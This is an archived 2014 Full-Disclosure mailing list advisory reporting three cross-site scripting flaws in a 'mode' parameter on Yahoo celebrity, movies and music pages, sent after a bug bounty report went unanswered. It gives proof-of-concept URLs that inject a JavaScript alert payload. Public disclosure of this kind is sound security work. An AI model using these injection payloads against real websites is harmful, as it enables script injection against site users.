| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <531AF079.9080105@t-online.de>
Date: Sat, 08 Mar 2014 11:27:05 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Yahoo Bug Bounty Program Vulnerability #4 #5 #6
Cross-site Scripting vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)
Advisory: Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing
==========================
Vulnerability Description
==========================
The 'mode'-Paramter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability
==========================
PoC-Exploit
==========================
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
==========================
Disclosure Timeline
==========================
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)
==========================
Credits
==========================
Vulnerabilities found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----
Download attachment "0x62DC6CC0.asc" of type "application/pgp-keys" (1800 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists